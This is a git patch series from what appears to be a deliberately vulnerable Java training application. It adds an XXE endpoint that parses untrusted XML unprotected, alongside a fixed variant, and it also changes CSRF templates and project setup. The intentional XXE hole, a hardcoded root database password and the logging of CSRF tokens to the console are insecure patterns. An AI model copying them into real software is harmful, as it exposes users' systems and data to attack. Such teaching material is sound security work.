null==b?null:b},getAllResponseHeaders:function(){return 2===t?f:null},setRequestHeader:function(a,b){var c=a.toLowerCase();return t||(a=s[c]=s[c]||a,r[a]=b),this},overrideMimeType:function(a){return t||(k.mimeType=a),this},statusCode:function(a){var b;if(a)if(2>t)for(b in a)q[b]=[q[b],a[b]];else v.always(a[v.status]);return this},abort:function(a){var b=a||u;return i&&i.abort(b),x(0,b),this}};if(o.promise(v).complete=p.add,v.success=v.done,v.error=v.fail,k.url=((a||k.url||zc)+"").replace(Ac,"").replace(Fc,yc[1]+"//"),k.type=b.method||b.type||k.method||k.type,k.dataTypes=m.trim(k.dataType||"*").toLowerCase().match(E)||[""],null==k.crossDomain&&(c=Gc.exec(k.url.toLowerCase()),k.crossDomain=!(!c||c[1]===yc[1]&&c[2]===yc[2]&&(c[3]||("http:"===c[1]?"80":"443"))===(yc[3]||("http:"===yc[1]?"80":"443")))),k.data&&k.processData&&"string"!=typeof k.data&&(k.data=m.param(k.data,k.traditional)),Mc(Hc,k,b,v),2===t)return v;h=k.global,h&&0===m.active++&&m.event.trigger("ajaxStart"),k.type=k.type.toUpperCase(),k.hasContent=!Ec.test(k.type),e=k.url,k.hasContent||(k.data&&(e=k.url+=(wc.test(e)?"&":"?")+k.data,delete k.data),k.cache===!1&&(k.url=Bc.test(e)?e.replace(Bc,"$1_="+vc++):e+(wc.test(e)?"&":"?")+"_="+vc++)),k.ifModified&&(m.lastModified[e]&&v.setRequestHeader("If-Modified-Since",m.lastModified[e]),m.etag[e]&&v.setRequestHeader("If-None-Match",m.etag[e])),(k.data&&k.hasContent&&k.contentType!==!1||b.contentType)&&v.setRequestHeader("Content-Type",k.contentType),v.setRequestHeader("Accept",k.dataTypes[0]&&k.accepts[k.dataTypes[0]]?k.accepts[k.dataTypes[0]]+("*"!==k.dataTypes[0]?", "+Jc+"; q=0.01":""):k.accepts["*"]);for(d in k.headers)v.setRequestHeader(d,k.headers[d]);if(k.beforeSend&&(k.beforeSend.call(l,v,k)===!1||2===t))return v.abort();u="abort";for(d in{success:1,error:1,complete:1})v[d](k[d]);if(i=Mc(Ic,k,b,v)){v.readyState=1,h&&n.trigger("ajaxSend",[v,k]),k.async&&k.timeout>0&&(g=setTimeout(function(){v.abort("timeout")},k.timeout));try{t=1,i.send(r,x)}catch(w){if(!(2>t))throw w;x(-1,w)}}else x(-1,"No Transport");function x(a,b,c,d){var j,r,s,u,w,x=b;2!==t&&(t=2,g&&clearTimeout(g),i=void 0,f=d||"",v.readyState=a>0?4:0,j=a>=200&&300>a||304===a,c&&(u=Oc(k,v,c)),u=Pc(k,u,v,j),j?(k.ifModified&&(w=v.getResponseHeader("Last-Modified"),w&&(m.lastModified[e]=w),w=v.getResponseHeader("etag"),w&&(m.etag[e]=w)),204===a||"HEAD"===k.type?x="nocontent":304===a?x="notmodified":(x=u.state,r=u.data,s=u.error,j=!s)):(s=x,(a||!x)&&(x="error",0>a&&(a=0))),v.status=a,v.statusText=(b||x)+"",j?o.resolveWith(l,[r,x,v]):o.rejectWith(l,[v,x,s]),v.statusCode(q),q=void 0,h&&n.trigger(j?"ajaxSuccess":"ajaxError",[v,k,j?r:s]),p.fireWith(l,[v,x]),h&&(n.trigger("ajaxComplete",[v,k]),--m.active||m.event.trigger("ajaxStop")))}return v},getJSON:function(a,b,c){return m.get(a,b,c,"json")},getScript:function(a,b){return m.get(a,void 0,b,"script")}}),m.each(["get","post"],function(a,b){m[b]=function(a,c,d,e){return m.isFunction(c)&&(e=e||d,d=c,c=void 0),m.ajax({url:a,type:b,dataType:e,data:c,success:d})}}),m.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(a,b){m.fn[b]=function(a){return this.on(b,a)}}),m._evalUrl=function(a){return m.ajax({url:a,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},m.fn.extend({wrapAll:function(a){if(m.isFunction(a))return this.each(function(b){m(this).wrapAll(a.call(this,b))});if(this[0]){var b=m(a,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&b.insertBefore(this[0]),b.map(function(){var a=this;while(a.firstChild&&1===a.firstChild.nodeType)a=a.firstChild;return a}).append(this)}return this},wrapInner:function(a){return this.each(m.isFunction(a)?function(b){m(this).wrapInner(a.call(this,b))}:function(){var b=m(this),c=b.contents();c.length?c.wrapAll(a):b.append(a)})},wrap:function(a){var b=m.isFunction(a);return this.each(function(c){m(this).wrapAll(b?a.call(this,c):a)})},unwrap:function(){return this.parent().each(function(){m.nodeName(this,"body")||m(this).replaceWith(this.childNodes)}).end()}}),m.expr.filters.hidden=function(a){return a.offsetWidth<=0&&a.offsetHeight<=0||!k.reliableHiddenOffsets()&&"none"===(a.style&&a.style.display||m.css(a,"display"))},m.expr.filters.visible=function(a){return!m.expr.filters.hidden(a)};var Qc=/%20/g,Rc=/\[\]$/,Sc=/\r?\n/g,Tc=/^(?:submit|button|image|reset|file)$/i,Uc=/^(?:input|select|textarea|keygen)/i;function Vc(a,b,c,d){var e;if(m.isArray(b))m.each(b,function(b,e){c||Rc.test(a)?d(a,e):Vc(a+"["+("object"==typeof e?b:"")+"]",e,c,d)});else if(c||"object"!==m.type(b))d(a,b);else for(e in b)Vc(a+"["+e+"]",b[e],c,d)}m.param=function(a,b){var c,d=[],e=function(a,b){b=m.isFunction(b)?b():null==b?"":b,d[d.length]=encodeURIComponent(a)+"="+encodeURIComponent(b)};if(void 0===b&&(b=m.ajaxSettings&&m.ajaxSettings.traditional),m.isArray(a)||a.jquery&&!m.isPlainObject(a))m.each(a,function(){e(this.name,this.value)});else for(c in a)Vc(c,a[c],b,e);return d.join("&").replace(Qc,"+")},m.fn.extend({serialize:function(){return m.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var a=m.prop(this,"elements");return a?m.makeArray(a):this}).filter(function(){var a=this.type;return this.name&&!m(this).is(":disabled")&&Uc.test(this.nodeName)&&!Tc.test(a)&&(this.checked||!W.test(a))}).map(function(a,b){var c=m(this).val();return null==c?null:m.isArray(c)?m.map(c,function(a){return{name:b.name,value:a.replace(Sc,"\r\n")}}):{name:b.name,value:c.replace(Sc,"\r\n")}}).get()}}),m.ajaxSettings.xhr=void 0!==a.ActiveXObject?function(){return!this.isLocal&&/^(get|post|head|put|delete|options)$/i.test(this.type)&&Zc()||$c()}:Zc;var Wc=0,Xc={},Yc=m.ajaxSettings.xhr();a.ActiveXObject&&m(a).on("unload",function(){for(var a in Xc)Xc[a](void 0,!0)}),k.cors=!!Yc&&"withCredentials"in Yc,Yc=k.ajax=!!Yc,Yc&&m.ajaxTransport(function(a){if(!a.crossDomain||k.cors){var b;return{send:function(c,d){var e,f=a.xhr(),g=++Wc;if(f.open(a.type,a.url,a.async,a.username,a.password),a.xhrFields)for(e in a.xhrFields)f[e]=a.xhrFields[e];a.mimeType&&f.overrideMimeType&&f.overrideMimeType(a.mimeType),a.crossDomain||c["X-Requested-With"]||(c["X-Requested-With"]="XMLHttpRequest");for(e in c)void 0!==c[e]&&f.setRequestHeader(e,c[e]+"");f.send(a.hasContent&&a.data||null),b=function(c,e){var h,i,j;if(b&&(e||4===f.readyState))if(delete Xc[g],b=void 0,f.onreadystatechange=m.noop,e)4!==f.readyState&&f.abort();else{j={},h=f.status,"string"==typeof f.responseText&&(j.text=f.responseText);try{i=f.statusText}catch(k){i=""}h||!a.isLocal||a.crossDomain?1223===h&&(h=204):h=j.text?200:404}j&&d(h,i,j,f.getAllResponseHeaders())},a.async?4===f.readyState?setTimeout(b):f.onreadystatechange=Xc[g]=b:b()},abort:function(){b&&b(void 0,!0)}}}});function Zc(){try{return new a.XMLHttpRequest}catch(b){}}function $c(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}m.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(a){return m.globalEval(a),a}}}),m.ajaxPrefilter("script",function(a){void 0===a.cache&&(a.cache=!1),a.crossDomain&&(a.type="GET",a.global=!1)}),m.ajaxTransport("script",function(a){if(a.crossDomain){var b,c=y.head||m("head")[0]||y.documentElement;return{send:function(d,e){b=y.createElement("script"),b.async=!0,a.scriptCharset&&(b.charset=a.scriptCharset),b.src=a.url,b.onload=b.onreadystatechange=function(a,c){(c||!b.readyState||/loaded|complete/.test(b.readyState))&&(b.onload=b.onreadystatechange=null,b.parentNode&&b.parentNode.removeChild(b),b=null,c||e(200,"success"))},c.insertBefore(b,c.firstChild)},abort:function(){b&&b.onload(void 0,!0)}}}});var _c=[],ad=/(=)\?(?=&|$)|\?\?/;m.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var a=_c.pop()||m.expando+"_"+vc++;return this[a]=!0,a}}),m.ajaxPrefilter("json jsonp",function(b,c,d){var e,f,g,h=b.jsonp!==!1&&(ad.test(b.url)?"url":"string"==typeof b.data&&!(b.contentType||"").indexOf("application/x-www-form-urlencoded")&&ad.test(b.data)&&"data");return h||"jsonp"===b.dataTypes[0]?(e=b.jsonpCallback=m.isFunction(b.jsonpCallback)?b.jsonpCallback():b.jsonpCallback,h?b[h]=b[h].replace(ad,"$1"+e):b.jsonp!==!1&&(b.url+=(wc.test(b.url)?"&":"?")+b.jsonp+"="+e),b.converters["script json"]=function(){return g||m.error(e+" was not called"),g[0]},b.dataTypes[0]="json",f=a[e],a[e]=function(){g=arguments},d.always(function(){a[e]=f,b[e]&&(b.jsonpCallback=c.jsonpCallback,_c.push(e)),g&&m.isFunction(f)&&f(g[0]),g=f=void 0}),"script"):void 0}),m.parseHTML=function(a,b,c){if(!a||"string"!=typeof a)return null;"boolean"==typeof b&&(c=b,b=!1),b=b||y;var d=u.exec(a),e=!c&&[];return d?[b.createElement(d[1])]:(d=m.buildFragment([a],b,e),e&&e.length&&m(e).remove(),m.merge([],d.childNodes))};var bd=m.fn.load;m.fn.load=function(a,b,c){if("string"!=typeof a&&bd)return bd.apply(this,arguments);var d,e,f,g=this,h=a.indexOf(" ");return h>=0&&(d=m.trim(a.slice(h,a.length)),a=a.slice(0,h)),m.isFunction(b)?(c=b,b=void 0):b&&"object"==typeof b&&(f="POST"),g.length>0&&m.ajax({url:a,type:f,dataType:"html",data:b}).done(function(a){e=arguments,g.html(d?m("<div>").append(m.parseHTML(a)).find(d):a)}).complete(c&&function(a,b){g.each(c,e||[a.responseText,b,a])}),this},m.expr.filters.animated=function(a){return m.grep(m.timers,function(b){return a===b.elem}).length};var cd=a.document.documentElement;function dd(a){return m.isWindow(a)?a:9===a.nodeType?a.defaultView||a.parentWindow:!1}m.offset={setOffset:function(a,b,c){var d,e,f,g,h,i,j,k=m.css(a,"position"),l=m(a),n={};"static"===k&&(a.style.position="relative"),h=l.offset(),f=m.css(a,"top"),i=m.css(a,"left"),j=("absolute"===k||"fixed"===k)&&m.inArray("auto",[f,i])>-1,j?(d=l.position(),g=d.top,e=d.left):(g=parseFloat(f)||0,e=parseFloat(i)||0),m.isFunction(b)&&(b=b.call(a,c,h)),null!=b.top&&(n.top=b.top-h.top+g),null!=b.left&&(n.left=b.left-h.left+e),"using"in b?b.using.call(a,n):l.css(n)}},m.fn.extend({offset:function(a){if(arguments.length)return void 0===a?this:this.each(function(b){m.offset.setOffset(this,a,b)});var b,c,d={top:0,left:0},e=this[0],f=e&&e.ownerDocument;if(f)return b=f.documentElement,m.contains(b,e)?(typeof e.getBoundingClientRect!==K&&(d=e.getBoundingClientRect()),c=dd(f),{top:d.top+(c.pageYOffset||b.scrollTop)-(b.clientTop||0),left:d.left+(c.pageXOffset||b.scrollLeft)-(b.clientLeft||0)}):d},position:function(){if(this[0]){var a,b,c={top:0,left:0},d=this[0];return"fixed"===m.css(d,"position")?b=d.getBoundingClientRect():(a=this.offsetParent(),b=this.offset(),m.nodeName(a[0],"html")||(c=a.offset()),c.top+=m.css(a[0],"borderTopWidth",!0),c.left+=m.css(a[0],"borderLeftWidth",!0)),{top:b.top-c.top-m.css(d,"marginTop",!0),left:b.left-c.left-m.css(d,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){var a=this.offsetParent||cd;while(a&&!m.nodeName(a,"html")&&"static"===m.css(a,"position"))a=a.offsetParent;return a||cd})}}),m.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(a,b){var c=/Y/.test(b);m.fn[a]=function(d){return V(this,function(a,d,e){var f=dd(a);return void 0===e?f?b in f?f[b]:f.document.documentElement[d]:a[d]:void(f?f.scrollTo(c?m(f).scrollLeft():e,c?e:m(f).scrollTop()):a[d]=e)},a,d,arguments.length,null)}}),m.each(["top","left"],function(a,b){m.cssHooks[b]=Lb(k.pixelPosition,function(a,c){return c?(c=Jb(a,b),Hb.test(c)?m(a).position()[b]+"px":c):void 0})}),m.each({Height:"height",Width:"width"},function(a,b){m.each({padding:"inner"+a,content:b,"":"outer"+a},function(c,d){m.fn[d]=function(d,e){var f=arguments.length&&(c||"boolean"!=typeof d),g=c||(d===!0||e===!0?"margin":"border");return V(this,function(b,c,d){var e;return m.isWindow(b)?b.document.documentElement["client"+a]:9===b.nodeType?(e=b.documentElement,Math.max(b.body["scroll"+a],e["scroll"+a],b.body["offset"+a],e["offset"+a],e["client"+a])):void 0===d?m.css(b,c,g):m.style(b,c,d,g)},b,f?d:void 0,f,null)}})}),m.fn.size=function(){return this.length},m.fn.andSelf=m.fn.addBack,"function"==typeof define&&define.amd&&define("jquery",[],function(){return m});var ed=a.jQuery,fd=a.$;return m.noConflict=function(b){return a.$===m&&(a.$=fd),b&&a.jQuery===m&&(a.jQuery=ed),m},typeof b===K&&(a.jQuery=a.$=m),m});
\ No newline at end of file
diff --git a/src/main/resources/templates/form.html b/src/main/resources/templates/form.html
index 3c98b503..2ed5a571 100644
--- a/src/main/resources/templates/form.html
+++ b/src/main/resources/templates/form.html
@@ -1,13 +1,21 @@
 
 <html xmlns:th="http://www.thymeleaf.org" lang="en">
+<head>
+    <script th:src="@{https://code.jquery.com/jquery-3.4.1.min.js}"></script>
+</head>
+
+
 
 <body>
 
 
 <div>
-    <form name="f" th:action="@{/csrf/post}" method="post">
+    <!-- th:action with Spring 3.2+ and Thymeleaf 2.1+ can automatically force Thymeleaf to include the CSRF token as a hidden field -->
+    <!-- <form name="f" th:action="@{/csrf/post}" method="post"> -->
+    <form name="f" action="/csrf/post" method="post">
         <input type="text" name="input" />
         <input type="submit" value="Submit" />
+        <input type="hidden" th:name="${_csrf.parameterName}" th:value="${_csrf.token}" />
     </form>
 </div>
 
@@ -16,4 +24,5 @@
 
 
 
+
 </html>
\ No newline at end of file
diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index 5c5415aa..f5c4f7f2 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -1,41 +1,64 @@
 <!DOCTYPE html>
 <html xmlns:th="http://www.thymeleaf.org">
+
 <head>
-    <meta charset="UTF-8" />
     <title>Login</title>
+    <meta charset="UTF-8" />
+    <meta name="_csrf" th:content="${_csrf.token}" />
+    <meta name="_csrf_headerName" th:content="${_csrf.headerName}" />
+    <meta name="_csrf_parameterName" th:content="${_csrf.parameterName}" />
     <link rel="stylesheet" th:href="@{/css/login.css}" type="text/css" />
-    <script th:src="@{/js/jquery-1.11.1.min.js}"></script>
+    <script th:src="@{https://code.jquery.com/jquery-3.4.1.min.js}"></script>
+
+    <script>
+        window.csrfToken = {
+            "tokenName" : $("meta[name='_csrf_headerName']").attr("content"),
+            "tokenValue" : $("meta[name='_csrf']").attr("content")
+        };
+        console.log(csrfToken.tokenName);
+        console.log(csrfToken.tokenValue);
+
+    </script>
+
 </head>
+
+
 <body>
 <div class="login-page">
     <div class="form">
         <input type="text" placeholder="Username" name="username" required="required"/>
         <input type="password" placeholder="Password" name="password" required="required"/>
-        <p><input type="checkbox" name="remember-me" />RememberMe</p>
+        <p><input type="checkbox" name="remember-me" checked="checked"/>RememberMe</p>
         <button onclick="login()">Login</button>
     </div>
 </div>
 </body>
 <script th:inline="javascript">
     var ctx = [[@{/}]];
-        function login() {
-            var username = $("input[name='username']").val();
-            var password = $("input[name='password']").val();
-            var remember_me =$("input[name='remember-me']").is(':checked');
-            $.ajax({
-                type: "post",
-                url: ctx + "login",
-                data: {"username": username, "password": password, "remember-me": remember_me},
-                dataType: "json",
-                success: function (r) {
-                    if (r.code == 0) {
-                        // alert(r.message);
-                        location.href = ctx + 'index';
-                    } else {
-                        alert(r.message);
-                    }
+    var tokenHeader = {};
+    tokenHeader[csrfToken.tokenName] = csrfToken.tokenValue;  // header must be a object
+
+    function login() {
+        var username = $("input[name='username']").val();
+        var password = $("input[name='password']").val();
+        var remember_me =$("input[name='remember-me']").is(':checked');
+        $.ajax({
+            type: "post",
+            url: ctx + "login",
+            // headers: {csrfToken.tokenName: csrfToken.tokenValue}  not ok
+            // headers: { "X-XSRF-TOKEN" : csrfToken}   ok
+            headers: tokenHeader,
+            data: { "username": username, "password": password, "remember-me": remember_me},
+            dataType: "json",
+            success: function (r) {
+                if (r.code == 0) {
+                    // alert(r.message);
+                    location.href = ctx + 'index';
+                } else {
+                    alert(r.message);
                 }
-            });
-        }
+            }
+        });
+    }
 </script>
 </html>
\ No newline at end of file

From 0a9f1ec92dda9b7df73e409eeb009d54018b685a Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 29 Jul 2019 10:31:38 +0800
Subject: [PATCH 053/108] update readme

---
 README.md          | 1 +
 README_zh.md       | 1 +
 docker-compose.yml | 4 ++--
 pom.xml            | 2 +-
 4 files changed, 5 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index be72a1b3..6b4137b9 100644
--- a/README.md
+++ b/README.md
@@ -35,6 +35,7 @@ Sort by letter.
 - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
+- [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
 
 
diff --git a/README_zh.md b/README_zh.md
index b2185b95..7fe2d63a 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -32,6 +32,7 @@
 - [URL Redirect](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLRedirect.java)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/URLWhiteList.java)
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
+- [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
 
 
diff --git a/docker-compose.yml b/docker-compose.yml
index eb74348b..cb3f8efa 100644
--- a/docker-compose.yml
+++ b/docker-compose.yml
@@ -1,13 +1,13 @@
 version : '2'
 services:
     jsc:
-        image: joychou/jsc:1.0
+        image: joychou/jsc:latest
         ports:
             - "8080:8080"
         links:
             - j_mysql
 
     j_mysql:
-        image: joychou/jsc_mysql:1.0
+        image: joychou/jsc_mysql:latest
         ports:
             - "3306:3306"
diff --git a/pom.xml b/pom.xml
index 953440ec..5f39a0bc 100644
--- a/pom.xml
+++ b/pom.xml
@@ -7,7 +7,7 @@
     <groupId>sec</groupId>
     <artifactId>java-sec-code</artifactId>
     <version>1.0.0</version>
-    <packaging>war</packaging>
+    <packaging>jar</packaging>
 
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->

From ea74d170f1f0cf645617b031a8495bfba0d5165e Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 30 Jul 2019 14:07:09 +0800
Subject: [PATCH 054/108] add a xxe sink code

---
 README.md                                     | 14 +++++
 README_zh.md                                  | 11 ++++
 .../java/org/joychou/controller/SQLI.java     |  2 +-
 src/main/java/org/joychou/controller/XXE.java | 54 +++++++++++++------
 .../org/joychou/controller/jsonp/JSONP.java   | 15 +++---
 src/main/resources/application.properties     |  2 +-
 6 files changed, 72 insertions(+), 26 deletions(-)

diff --git a/README.md b/README.md
index 6b4137b9..334b1304 100644
--- a/README.md
+++ b/README.md
@@ -11,6 +11,11 @@ This project can also be called Java vulnerability code.
 
 Each vulnerability type code has a security vulnerability by default unless there is no vulnerability. The relevant fix code is in the comments or code. Specifically, you can view each vulnerability code and comments.
 
+[Online demo](http://118.25.15.216:8080)
+
+
+
+
 
 ## Vulnerability Code
 
@@ -73,11 +78,20 @@ spring.datasource.password=woshishujukumima
 ### Docker
 
 
+Start docker:
 
 ``` 
+docker-compose pull
 docker-compose up
 ```
 
+
+Stop docker:
+
+```
+docker-compose down
+```
+
 Docker's environment:
 
 - Java 1.8.0_102
diff --git a/README_zh.md b/README_zh.md
index 7fe2d63a..d02cd483 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -10,6 +10,8 @@
 
 每个漏洞类型代码默认存在安全漏洞（除非本身不存在漏洞），相关修复代码在注释里。具体可查看每个漏洞代码和注释。
 
+[在线Demo](http://118.25.15.216:8080)
+
 
 ## 漏洞代码
 
@@ -70,10 +72,19 @@ spring.datasource.password=woshishujukumima
 
 ### Docker
 
+开启应用：
+
 ``` 
+docker-compose pull
 docker-compose up
 ```
 
+关闭应用：
+
+```
+docker-compose down
+```
+
 Docker环境：
 
 - Java 1.8.0_102
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index a4344b85..234d67c2 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -21,7 +21,7 @@
 public class SQLI {
 
     private static String driver = "com.mysql.jdbc.Driver";
-    private static String url = "jdbc:mysql://localhost:3306/java_sec_code";
+    private static String url = "jdbc:mysql://127.0.0.1:3306/java_sec_code";
     private static String user = "root";
     private static String password = "woshishujukumima";
 
diff --git a/src/main/java/org/joychou/controller/XXE.java b/src/main/java/org/joychou/controller/XXE.java
index 445f8ef8..71a9ffe6 100644
--- a/src/main/java/org/joychou/controller/XXE.java
+++ b/src/main/java/org/joychou/controller/XXE.java
@@ -2,7 +2,6 @@
 
 
 import org.dom4j.io.SAXReader;
-import org.springframework.stereotype.*;
 import org.springframework.web.bind.annotation.*;
 import javax.servlet.http.HttpServletRequest;
 import org.w3c.dom.Document;
@@ -28,12 +27,11 @@
  * @author JoyChou @2017-12-22
  */
 
-@Controller
+@RestController
 @RequestMapping("/xxe")
 public class XXE {
 
     @RequestMapping(value = "/xmlReader", method = RequestMethod.POST)
-    @ResponseBody
     public String xxe_xmlReader(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -49,7 +47,6 @@ public String xxe_xmlReader(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/xmlReader_fix", method = RequestMethod.POST)
-    @ResponseBody
     public  String xxe_xmlReader_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -72,7 +69,6 @@ public  String xxe_xmlReader_fix(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/SAXBuilder", method = RequestMethod.POST)
-    @ResponseBody
     public  String xxe_SAXBuilder(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -88,7 +84,6 @@ public  String xxe_SAXBuilder(HttpServletRequest request) {
     }
 
     @RequestMapping(value = "/SAXBuilder_fix", method = RequestMethod.POST)
-    @ResponseBody
     public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -107,7 +102,6 @@ public  String xxe_SAXBuilder_fix(HttpServletRequest request) {
     }
 
     @RequestMapping(value = "/SAXReader", method = RequestMethod.POST)
-    @ResponseBody
     public  String xxe_SAXReader(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -124,7 +118,6 @@ public  String xxe_SAXReader(HttpServletRequest request) {
     }
 
     @RequestMapping(value = "/SAXReader_fix", method = RequestMethod.POST)
-    @ResponseBody
     public  String xxe_SAXReader_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -144,7 +137,6 @@ public  String xxe_SAXReader_fix(HttpServletRequest request) {
     }
 
     @RequestMapping(value = "/SAXParser", method = RequestMethod.POST)
-    @ResponseBody
     public String xxe_SAXParser(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -163,7 +155,6 @@ public String xxe_SAXParser(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/SAXParser_fix", method = RequestMethod.POST)
-    @ResponseBody
     public String xxe_SAXParser_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -184,7 +175,6 @@ public String xxe_SAXParser_fix(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/Digester", method = RequestMethod.POST)
-    @ResponseBody
     public String xxe_Digester(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -201,7 +191,6 @@ public String xxe_Digester(HttpServletRequest request) {
     }
 
     @RequestMapping(value = "/Digester_fix", method = RequestMethod.POST)
-    @ResponseBody
     public String xxe_Digester_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -223,7 +212,6 @@ public String xxe_Digester_fix(HttpServletRequest request) {
 
     // 有回显的XXE
     @RequestMapping(value = "/DocumentBuilder_return", method = RequestMethod.POST)
-    @ResponseBody
     public String xxeDocumentBuilderReturn(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -257,7 +245,6 @@ public String xxeDocumentBuilderReturn(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/DocumentBuilder", method = RequestMethod.POST)
-    @ResponseBody
     public String DocumentBuilder(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -294,7 +281,6 @@ public String DocumentBuilder(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/DocumentBuilder_fix", method = RequestMethod.POST)
-    @ResponseBody
     public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -319,7 +305,6 @@ public String xxe_DocumentBuilder_fix(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/DocumentBuilder_xinclude", method = RequestMethod.POST)
-    @ResponseBody
     public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -356,7 +341,6 @@ public String xxe_xinclude_DocumentBuilder(HttpServletRequest request) {
 
 
     @RequestMapping(value = "/DocumentBuilder_xinclude_fix", method = RequestMethod.POST)
-    @ResponseBody
     public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
         try {
             String xml_con = Tools.getBody(request);
@@ -395,4 +379,40 @@ public String xxe_xinclude_DocumentBuilder_fix(HttpServletRequest request) {
     }
 
 
+    @PostMapping("/XMLReader/vul")
+    public String XMLReaderVul(HttpServletRequest request) {
+        try {
+            String xml_con = Tools.getBody(request);
+            System.out.println(xml_con);
+            SAXParserFactory spf = SAXParserFactory.newInstance();
+            SAXParser saxParser = spf.newSAXParser();
+            XMLReader xmlReader = saxParser.getXMLReader();
+            xmlReader.parse( new InputSource(new StringReader(xml_con)) );
+            return "test";
+        } catch (Exception e) {
+            System.out.println(e.toString());
+            return "except";
+        }
+    }
+
+
+    @PostMapping("/XMLReader/fixed")
+    public String XMLReaderSec(HttpServletRequest request) {
+        try {
+            String xml_con = Tools.getBody(request);
+            System.out.println(xml_con);
+            SAXParserFactory spf = SAXParserFactory.newInstance();
+            SAXParser saxParser = spf.newSAXParser();
+            XMLReader xmlReader = saxParser.getXMLReader();
+            xmlReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
+            xmlReader.setFeature("http://xml.org/sax/features/external-general-entities", false);
+            xmlReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
+            xmlReader.parse( new InputSource(new StringReader(xml_con)) );
+            return "test";
+        } catch (Exception e) {
+            System.out.println(e.toString());
+            return "except";
+        }
+    }
+
 }
diff --git a/src/main/java/org/joychou/controller/jsonp/JSONP.java b/src/main/java/org/joychou/controller/jsonp/JSONP.java
index 89b77fd6..cfdb1de0 100644
--- a/src/main/java/org/joychou/controller/jsonp/JSONP.java
+++ b/src/main/java/org/joychou/controller/jsonp/JSONP.java
@@ -2,10 +2,13 @@
 
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
+
 import org.joychou.security.SecurityUtil;
 import org.springframework.http.MediaType;
 import org.springframework.security.web.csrf.CsrfToken;
+import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.*;
+
 import javax.servlet.http.HttpServletRequest;
 import java.security.Principal;
 import java.util.HashMap;
@@ -35,11 +38,11 @@ public static String getUserInfo(HttpServletRequest request) {
 
         return JSON.toJSONString(m);
     }
+
     /**
      * Set the response content-type to application/javascript.
-     *
+     * <p>
      * http://localhost:8080/jsonp/referer?callback=test
-     *
      */
     @RequestMapping(value = "/referer", produces = "application/javascript")
     private String referer(HttpServletRequest request) {
@@ -50,9 +53,8 @@ private String referer(HttpServletRequest request) {
     /**
      * Direct access does not check Referer, non-direct access check referer.
      * Developer like to do jsonp testing like this.
-     *
+     * <p>
      * http://localhost:8080/jsonp/emptyReferer?callback=test
-     *
      */
     @RequestMapping(value = "/emptyReferer", produces = "application/javascript")
